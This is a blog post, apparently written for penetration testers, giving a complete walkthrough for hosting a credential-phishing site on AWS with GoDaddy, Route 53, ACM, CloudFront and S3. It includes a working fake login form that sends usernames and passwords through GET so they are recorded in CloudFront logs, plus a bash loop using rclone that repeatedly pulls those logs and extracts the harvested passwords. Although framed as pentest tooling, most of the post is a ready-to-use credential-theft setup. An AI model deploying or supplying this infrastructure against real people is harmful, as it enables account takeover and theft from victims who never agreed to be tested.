Serverless Phishing With AWS

 

 

I plan to build on this project more since the automation and integration possibilities can be expanded, but for now I have a serverless phishing infrastructure working that can be quickly spun up during penetration tests and involves the following pieces:


  • Domain registrar - GoDaddy
  • DNS provider - AWS Route 53
  • SSL/TLS - AWS Certificate Manager and CloudFront
  • Static HTML phishing website - AWS S3
  • Logging of phished credentials: AWS CloudFront logging to S3

 

One of the benefits to using this methodology is how simple and quick it is to setup SSL/TLS, as you will see. In addition, it's serverless and no server-side code is required, though adding Lambda functions would be a great way to automate further.

Here are the prerequisites you'll need to get started:

  • GoDaddy account
  • AWS account
  • GoDaddy domain name already purchased that also is available as a name in S3 (they must match exactly)
  • No private files that will need to be stored on the public S3 bucket
  • Awareness of AWS' penetration testing policy (google it)
  • Ability to asses your individual security needs, and harden the environment I've presented here accordingly. As an example, you may require that the S3 bucket be encrypted, etc.
  • Ability to assess your own billing needs and capabilities so that you don't inadvertently rack up a large AWS bill.


Here are setup instructions:


Create HTML file with the phish

This file will be your phish and should be named index.html. There are lots of ways to code this with varying levels of complexity and elegance. Below is a simple example. The key part is where the form action submits the data to the main URL of your phishing site (the same site this HTML file is hosted on) as a GET request. That's shown on line 5, below. This may seem counter-intuitive, but this is done so that the credentials are inserted into the URL (though they are encrypted in transit) and therefore shown in the logs.

<html>
<header><title>ALL YOUR PASSWORDS ARE BELONG TO US</title></header>
<body>
<form action="https://example.com/" method="get">
<p><label for="username">Username: </label><input type="text" name="username" id="username" /></p>
<p><label for="password">Password: </label><input type="password" name="password" id="password" /></p>
<p><input type="submit" id="submit" class="button" value="Submit" /></p>
</form>
</body>
</html>



Setup S3

  1. Create a public S3 bucket that matches the GoDaddy domain name (they must match exactly, though this may sound crazy)
  2. Edit the properties of the S3 bucket to enable static website hosting and specify an index.html file
  3. Upload the index.html you made above, granting public read access.
  4. Test and make sure your S3 bucket and index.html file are publicly accessible: https://s3.amazonaws.com/example.com/index.html


Setup DNS

  1. Create a Route 53 publicly hosted zone, and create a simple record pointing to the relevant S3 bucket in the dropdown
  2. Point GoDaddy's nameservers for the domain to match those of your Route 53 zone
  3. Test your website using the GoDaddy domain name (not the S3 URL): example.com


Setup SSL/TLS

  1. Change to the us-east-1 region. This is the only region supported for CloudFront so you must create your certificate here.
  2. Navigate within AWS to Certificate Manager
  3. Create a new certificate and choose the option to verify using DNS
  4. During the wizard, expand the entry for your domain name and click the button to "Create record in Route 53". This automates the DNS verification completely since you are using Route 53.
  5. Within CloudFront, click to create a new distribution and fill out the web form. If needed, choose Redirect HTTP to HTTPS. In the list of certificates, choose the one you made a moment ago. Set the Default Root Object to index.html.
  6. Configure the Route 53 zone so that it points to CloudFront instead of directly to S3. This is done by editing the A record and pointing it to an "Alias to CloudFront distribution".
  7. Test your website's SSL/TLS: https://example.com


Lock down direct S3 access (optional)

  1. You can increase security by configuring things so that the contents of the S3 bucket can only be reached via CloudFront and not directly. To do this, start with editing the CloudFront distribution
  2. Edit the Origin and Origin Groups and choose Yes under Restrict Bucket Access.
  3. Create or choose an identity and set it to automatically update your bucket policy.
  4. Check your S3 policy manually to ensure the policy automation was successful and also manually lock down any file-based permissions on index.html, as well.
  5. Test your website via CloudFront to make sure it is still up: example.com
  6. Test your S3 bucket (this should fail): https://s3.amazonaws.com/example.com
  7. Test your S3 bucket's index.html (this should also fail): https://s3.amazonaws.com/example.com/index.html

 

Log and Retrieve Phished Credentials

  1. Create a second S3 bucket that will store your phished credentials. Set the permissions to "Grant Amazon S3 Log Delivery Group write access to this bucket."
  2. Edit your CloudFront distribution and turn "Logging" to "On". Specify the "Bucket for Logs" to be the bucket you created in the previous step.
  3. Test your phish, by submitting credentials.
  4. Check your second S3 bucket to see if it has been updated with any log files. Keep in mind, there may be a delay before log files appear.
  5. Download the gzip file, extract it, and check to see if your phish test was successful. This can be automated using the next step.

 

Automate Credential Retrieval

You can automate the credential retrieval using aws-cli or rclone. Using rclone is very straightforward, and below is a bash script you can use on your local Linux machine to check your S3 bucket for incoming phished credentials. Just make sure you run 'rclone config' first and input your AWS Access Key and Secret Access Key, etc. If you don't have these keys yet, you can easily retrieve them in the AWS console by clicking your name in the upper left hand corner, choosing "My Security Credentials", and navigating to "Access keys". Here's the bash script:

#!/bin/bash
for (( ; ; ))
do
echo "====Checking for phished credentials. Use CTRL+C to stop===="
rclone sync the-rclone-config-name:s3-logging-bucket-name ./test
gzip -df ./test/*
grep password ./test/* | awk '{ print $12 }'
sleep 30
done

 

Build on this idea

There are endless ways to build on this, so feel free to comment with your tweaks and automations!



References

Here are some resources that were useful to me during setup:


https://medium.com/@sbuckpesch/setup-aws-s3-static-website-hosting-using-ssl-acm-34d41d32e394

https://www.freecodecamp.org/news/simple-site-hosting-with-amazon-s3-and-https-5e78017f482a/

https://medium.com/@channaly/how-to-host-static-website-with-https-using-amazon-s3-251434490c59

 

Comments

Post a Comment

Popular Posts